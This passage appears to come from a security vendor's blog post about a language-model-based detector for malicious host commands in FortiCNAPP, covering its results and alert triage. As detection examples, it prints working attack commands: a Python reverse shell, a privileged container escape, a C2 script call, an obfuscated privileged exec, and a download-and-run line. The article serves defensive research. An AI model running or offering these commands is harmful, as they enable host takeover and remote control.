The improved recall of the Anomalous Host Command model has been demonstrated through the previously unseen malicious commands it has detected. Before the release of our model, we used it to scan data from previously identified intrusions. In those experiments, we identified dozens of malicious commands that our existing rule-based detection logic missed. Since the deployment of the Anomalous Host Command detection, we continue to find new signs of intrusion on an almost daily basis, including more comprehensive detection of penetration test activities than was previously achieved. A small selection of the commands that our small language model has recently surfaced are shown below. Notably, some of the commands surfaced by the model match patterns we described earlier in this article, validating that the model has learned to recognize these strategies.

 

Python reverse shell:

python -c a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("<REDACTED_IP>",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")

 

Container escape and host takeover:

./docker run -it -v /:/host --privileged osexp2000/ubuntu-with-utils

 

C2 attack script with keep-alive:

/bin/sh -c /tmp/attack '{"port": "4444", "ip": "<REDACTED_IP>", "procedure": "bash196"}' && tail -f /dev/null

 

Malicious payload obfuscation with privilege escalation:

sudo -u root -H -- /usr/bin/python -c import codecs,os,sys;_=codecs.decode;exec(_(_("<REDACTED_PAYLOAD>".encode(),"base64"),"zip"))

 

Suspicious download and execute:

/bin/sh -c wget http://<REDACTED_PUBLIC_IP>:8000/tmp && chmod 777 tmp && ./tmp

 

The Anomalous Host Command model has made our detection of malicious commands more robust while keeping alert volume low. The production version of the model flags fewer than one command in a million as worthy of examination.
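To put that rate in perspective against the "millions if not billions" of daily events described earlier, the following quick calculation uses hypothetical daily volumes. Because the stated rate is an upper bound, the results are ceilings.

```python
def max_flagged_per_day(events_per_day: int, one_in: int = 1_000_000) -> int:
    """Upper bound on flagged commands per day at a rate of fewer than 1 in `one_in`."""
    return events_per_day // one_in


# Hypothetical daily volumes spanning the "millions to billions" range.
for events in (10_000_000, 1_000_000_000):
    print(f"{events:,} events/day -> at most ~{max_flagged_per_day(events):,} flagged")
```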

 

Having demonstrated that the Anomalous Host Command model detects a broader spectrum of suspicious behaviors than was previously achievable, we now move on to how these detections are presented within the FortiCNAPP product.

 

Triaging Anomalous Host Commands

 

The Anomalous Host Command detection contributes to Composite Alerts. As such, it appears in the Observation Timeline and the Intrusion Graph of any Composite Alert where it has been triggered. Because details about the process in question are so important to triaging these detections, we enrich each anomalous process with the command lines of its parent processes, up to five levels up the process tree. That information can be seen by clicking on the "ran anomalous process" edge in the Intrusion Graph.
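Collecting those parent command lines amounts to walking up the process tree. The following minimal sketch assumes a hypothetical in-memory process table keyed by PID. In practice, this data would come from collected process telemetry, whose format is not described here.

```python
# Hypothetical process table: pid -> (parent pid, command line).
PROCESS_TABLE: dict[int, tuple[int, str]] = {
    1: (0, "/sbin/init"),
    200: (1, "gunicorn --workers 4 app:app"),
    210: (200, "gunicorn --workers 4 app:app"),
    305: (210, "/bin/sh -c <REVERSE_SHELL_COMMAND>"),
}


def parent_command_lines(pid: int, processes: dict[int, tuple[int, str]], max_depth: int = 5) -> list[str]:
    """Return the command lines of up to `max_depth` ancestors, nearest parent first.

    The depth limit also guarantees termination if the table contains a cycle.
    """
    chain: list[str] = []
    current = processes[pid][0]  # start from the immediate parent
    while current in processes and len(chain) < max_depth:
        parent_pid, command_line = processes[current]
        chain.append(command_line)
        current = parent_pid
    return chain


for depth, line in enumerate(parent_command_lines(305, PROCESS_TABLE), start=1):
    print(depth, line)
```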

 


Intrusion Graph from a FortiCNAPP Composite Alert with the 'ran anomalous process' edge selected.

 

Clicking on the "ran anomalous process" edge allows you to select any individual anomalous process and view the command lines of its parent processes. In this example, the reverse shell command line string is alarming in itself, but the fact that its parent process is gunicorn (a Python web server) clarifies how the reverse shell was executed: a vulnerability in the web server was exploited to gain access to the host.

 


Detail panel for a selected process. The command line strings for the parent processes of the reverse shell command are visible. In this case they show the command was executed by a webserver.

 

While these details are all available for manual investigation through the UI, the most efficient way to triage Composite Alerts is through the FortiCNAPP AI Assistant. The AI Assistant is available for all Composite Alerts and is accessible on the right-hand side of the screen. It takes all of the evidence compiled as part of a Composite Alert into account when assessing the likelihood of a compromise and recommending next steps. Composite Alerts automatically enrich any anomalous host commands with (1) the command line strings of parent processes and (2) any other detections that triggered for associated machines around the same time. As a result, the AI Assistant has good context to help triage the alert.

 

Conclusion

 

Detecting malicious commands in a sea of benign process activity is a challenge that spans semantic complexity, adversarial evasion, and extreme scale. As we have shown, the differences between a malicious command and a benign one can be extremely subtle, and attackers actively exploit that subtlety. Rule-based detection, while valuable for known patterns, cannot keep pace with the combinatorial variety of techniques available to a motivated adversary. By applying transformer-based models trained through knowledge distillation, we gain many of the semantic reasoning capabilities of large language models at a fraction of the cost. That enables us to analyze millions of commands per day and surface novel malicious behavior that static rules miss. Since deployment, the Anomalous Host Command model has regularly uncovered previously undetected signs of intrusion, validating the approach in practice. As attacker techniques continue to evolve, so too will our models, and we look forward to refining this capability based on what it continues to find.

 

1 reply

alissonfreire
Staff
March 10, 2026

This is a very detailed and informative article. Great job, and thank you for sharing!